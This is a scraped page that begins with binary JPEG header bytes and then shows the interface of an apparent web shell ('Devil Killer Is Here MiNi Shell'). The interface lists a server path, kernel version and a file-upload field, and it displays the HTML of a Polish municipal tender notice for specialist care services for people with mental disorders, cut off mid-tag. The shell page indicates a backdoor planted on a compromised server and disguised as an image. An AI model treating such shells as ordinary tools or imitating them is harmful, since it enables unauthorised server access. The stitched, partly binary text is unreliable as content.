JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230111/0002150801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w 2023 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LISIA GÓRA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660944</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lisia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">146784678</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">146784249</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gops@lisiagora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lisiagora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w 2023 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c00f1713-917c-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00021508</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c00f1713-917c-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamówienia.gov.pl.<br/>1) Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesłanej wiadomości (przycisk „dodaj załącznik”).<br/>4) W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: gops@lisiagora.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamówienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>5) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. 6) Maksymalny rozmiar plików przesłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesłanych jako załączniki do jednego formularza). <br/>7) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https;//ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO informuję, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Gminny Ośrodek Pomocy Społecznej w Lisiej Górze ul. 1 Maja 7, 33-140 Lisia Góra<br/>2.	kontakt z inspektorem ochrony danych osobowych w Gminnym Ośrodku Pomocy Społecznej pod adresem: ido@lisiagora.pl.<br/>3.	Pani/ Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego prowadzonego w trybie podstawowym<br/>4.	dane osobowe mogą zostać ujawnione właściwym organom oraz podmiotom (w tym Wykonawcom oraz każdemu kto jest zainteresowany zgodnie z zasadą jawności postępowania), upoważnionym zgodnie z obowiązującym prawem,<br/>5.	Pani/ Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Prawa zamówień publicznych przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym określonym w przepisach Prawa zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Prawa zamówień publicznych,<br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>8.	posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/ Pana dotyczących,<br/>na podstawie art. 16 RODO prawo do sprostowania lub uzależnienia swoich danych osobowych ,<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ,<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych osobowych Pani/ Pana dotyczących narusza przepisy RODO,	<br/>9.	nie przysługuje Pani/ Panu:<br/>•	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/ Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOPS-26-1/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: „Świadczenie specjalistycznych usług dla osób z zaburzeniami psychicznymi w 2023 r.”- w miejscu zamieszkania świadczeniobiorców, zwanych dalej „usługami” dla osób uprawnionych na podstawie decyzji administracyjnej wydanej przez Zamawiającego, zwanych dalej „świadczeniobiorcami”. Przy świadczeniu usług mają zastosowanie w szczególności przepisy ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2021 r. poz. 2268 z późn. zm.) oraz rozporządzenie Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. Nr 189 poz. 1598, z późn. zm.).<br/>2.	Opis przedmiotu zamówienia:<br/>Rodzaje usług: Świadczenie specjalistycznych usług opiekuńczych osobom z zaburzeniami psychicznymi zgodnie z rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych obejmuje:<br/>1)	uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia:<br/>•	kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych,<br/>•	kształtowanie umiejętności społecznego funkcjonowania,<br/>•	motywowanie do aktywności, leczenia i rehabilitacji,<br/>•	prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych,<br/>2)	wspieranie, także w formie asystowania w codziennych czynnościach życiowych, w szczególności<br/>takich jak:<br/>•	samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu,<br/>•	dbałość o higienę i wygląd,<br/>•	utrzymywanie kontaktów społecznych z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną,<br/>•	wspólne organizowanie i spędzanie czasu wolnego,<br/>•	korzystanie z usług różnych instytucji,<br/>3)	interwencje i pomoc w życiu w rodzinie, w tym:<br/>•	pomoc w radzeniu sobie w sytuacjach kryzysowych – poradnictwo specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,<br/>•	ułatwienie dostępu do edukacji i kultury,<br/>•	doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług,<br/>•	kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi,<br/>•	współpracę z rodziną - kształtowanie odpowiednich postaw wobec osoby chorej, niepełnosprawnej,<br/>4)	pomoc w załatwianiu spraw urzędowych, w tym:<br/>•	w uzyskaniu świadczeń socjalnych, emerytalno - rentowych,<br/>•	w wypełnianiu dokumentów urzędowych,<br/>•	wspieranie i pomoc w uzyskaniu zatrudnienia, w tym:<br/>•	w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia lub alternatywnego zajęcia,<br/>•	w szczególności uczestnictwo w warsztatach terapii zajęciowej, zakładach aktywizacji zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej, klubach pracy,<br/>•	w kompletowaniu dokumentów potrzebnych do podjęcia zatrudnienia,<br/>•	w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą,<br/>•	w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku,<br/>5)	pomoc w gospodarowaniu pieniędzmi, w tym:<br/>•	nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,<br/>•	pomoc w uzyskaniu ulg w opłatach,<br/>•	zwiększenie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe,<br/>6)	pomoc mieszkaniową, w tym:<br/>•	w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,<br/>•	w organizowaniu drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,<br/>•	w kształtowaniu właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu,<br/>7)	pielęgnację - jako wspieranie procesu leczenia:<br/>•	pomoc w dostępie do świadczeń zdrowotnych,<br/>•	uzgodnienie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,<br/>•	pomoc w wykupywaniu lub zamawianiu leków w aptece,<br/>•	pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,<br/>•	w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny,<br/>•	pomoc w dotarciu do placówek służby zdrowia,<br/>•	pomoc w dotarciu do placówek rehabilitacyjnych,<br/>8)	rehabilitację fizyczną i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym<br/>przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych<br/>ze środków publicznych (Dz. U. z 2021 r. poz. 1285 z poźn. zm.):<br/>•	zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii,<br/>•	współpraca ze specjalistami w zakresie wspierania psychologicznego- pedagogicznego i edukacyjno – terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług,<br/>9)	zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć<br/>rehabilitacyjnych i rewalidacyjno-wychowawczych, w wyjątkowych przypadkach, jeżeli nie mają<br/>możliwości uzyskania dostępu do zajęć, o których mowa w art. 7 ustawy z dnia 19 sierpnia 1994 r.<br/>o ochronie zdrowia psychicznego (Dz. U. z 2020 r. poz. 685 z późn. zm.).<br/>W okresie realizacji zamówienia specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi będą świadczone łącznie dla około 6 osób. Zamawiający informuje, że w okresie od dnia podpisania umowy do 29 grudnia 2023 r. planuje zamówić świadczenie około 1680 godzin specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi. Zamawiający wskazuje minimalny wymiar usług: minimalna liczba godzin wynosi 1344.<br/>Szacowana ilość osób oraz ilość godzin odzwierciedlają obecną ilość osób wymagających specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi oraz przyznaną im liczbę godzin. Rzeczywista liczba godzin świadczenia usług uzależniona będzie od potrzeb Zamawiającego. W stosunku do ilości godzin Zamawiający zastrzega, że mogą one ulec zmianie (zwiększeniu lub zmniejszeniu), ponieważ nie można ich określić dokładnie ze względu na specyfikę zamówienia, którą cechuje zmienność liczby świadczeniobiorców i ich potrzeb z uwagi na zmieniający się stan zdrowia i sytuację życiową.<br/>Szacowany wymiar godzin realizacji zamówienia to około 1680 godzin, w tym:<br/>Lp.	USŁUGI SPECJALISTYCZNE	SZACUNKOWA LICZBA GODZIN<br/>1	Usługa wykonywana przez oligofrenopedagoga/ów,	120<br/>2	Usługa wykonywana przez fizjoterapeutę/ów,	1440<br/>3	Usług wykonywanych przez logopedę/ów	120<br/>RAZEM	1680 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">9. Zamawiający przewiduje możliwości udzielania zamówień podobnych, o których mowa w art. 214 ust.1 pkt: Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp w wys. nie większej niż 40% zamówienia podstawowego. Zamówienia polegać<br/>będą na powtórzeniu podobnych usług co zamówienie podstawowe i będą zgodne z<br/>przedmiotem zamówienia podstawowego, tj. objętym niniejszym postępowaniem i opisanym<br/>w Rozdziale II SWZ. Warunkiem udzielenia zamówień będzie przeprowadzenie negocjacji z<br/>wybranym Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający wybierze najkorzystniejszą ofertę na podstawie następujących kryteriów:<br/><br/>Lp.	nazwa kryterium	waga kryterium<br/>1.	cena oferty	60 %<br/>2.	doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia	40 %<br/>Punkty będą obliczone przy zastosowaniu niżej podanych wzorów, przyjmując zasadę, że 1% = 1 punkt.<br/>Ad 1. Cena oferty – w tym kryterium oferta może uzyskać maksymalnie 60 punktów. Ocena będzie dokonywana według wzoru:<br/>Cena („C”) = cena min / cena of x 60 = liczba punktów przyznana ofercie ocenianej, gdzie:<br/>cena min – cena brutto najniższej spośród badanych ofert,<br/>cena of - cena brutto oferty badanej.<br/>Ad. 2. Doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia (tj. „S”) - w tym kryterium oferta może uzyskać 40 punktów.<br/>Zamawiający przyzna następująco punkty w tym kryterium:<br/>-	Zamawiający przyzna 40 punktów, jeżeli Wykonawca wykaże, że dysponuje minimum 4 osobami, które<br/>będą realizować specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, które posiadają<br/>co najmniej dwuletnie doświadczenie w realizacji specjalistycznych usług opiekuńczych dla osób<br/>z zaburzeniami psychicznymi,<br/>-	Zamawiający przyzna 30 punktów, jeżeli Wykonawca wykaże, że dysponuje 3 osobami, które będą realizować specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, które posiadają co najmniej dwuletnie doświadczenie w realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi,<br/>-	Zamawiający przyzna 20 punktów, jeżeli Wykonawca wykaże, że dysponuje 2 osobami, które będą realizować specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, które posiadają co najmniej dwuletnie doświadczenie w realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi,<br/>-	Zamawiający przyzna 10 punktów, jeżeli Wykonawca wykaże, że dysponuje 1 osobą, która będzie realizować specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, która posiada co najmniej dwuletnie doświadczenie w realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi,<br/>-	Zamawiający przyzna 0 punktów, jeżeli Wykonawca nie wykaże, że dysponuje minimum 1 osobą, która będzie realizować specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, która posiada co najmniej dwuletnie doświadczenie w realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi.<br/>Uwaga: w przypadku gdy Wykonawca wskaże, że w wykonywaniu zamówienia będzie uczestniczyć więcej niż cztery osoby, do ustalenia liczby punktów w tym kryterium będzie brane pod uwagę doświadczenie osób z najkrótszym stażem (spełniających warunki, o których mowa w Rozdziale III ust. 2 pkt 4 Specyfikacji Warunków Zamówienia).<br/>Ocena w zakresie tego kryterium będzie dokonywana na podstawie informacji zawartych w ofercie Wykonawcy, sporządzonej według wzoru stanowiącego załącznik nr 1 do Specyfikacji Warunków Zamówienia.<br/>Obliczenie łącznej sumy punktów przyznanych każdej ofercie zostanie dokonane na podstawie wzoru: O = C + S, gdzie:<br/>O - łączna liczba punktów przyznanych ocenianej ofercie,<br/>C - liczba punktów przyznanych ocenianej ofercie w kryterium „cena” wynikająca z badanej oferty,<br/>S - liczba punktów przyznanych ocenianej ofercie w kryterium „doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia ” wynikająca z badanej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 